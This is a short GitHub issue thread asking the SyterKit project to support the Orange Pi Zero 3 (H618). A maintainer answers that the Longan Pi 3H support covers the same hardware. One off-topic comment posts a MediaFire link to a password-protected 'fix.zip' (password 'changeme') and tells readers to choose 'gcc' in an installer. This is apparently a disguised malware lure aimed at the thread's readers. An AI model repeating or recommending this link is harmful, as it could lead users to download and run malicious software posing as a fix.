### ISSUE TITLE
Orange Pi Zero 3

### ISSUE THREAD

**Issue by yuppox** [YuzukiHD/SyterKit#127]
**Is your feature request related to a problem? Please describe.**
More hardware support.

**Describe the solution you'd like**
Support for Orange Pi Zero 3, which is based on H618.

**Describe alternatives you've considered**
N/A

**Additional context**
Since the Longan Pi 3H, it might be possible to support another H618 board. H616 boards are likely also possible.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by YuzukiTsuru** [comment]
just use Longan Pi 3H, same hw
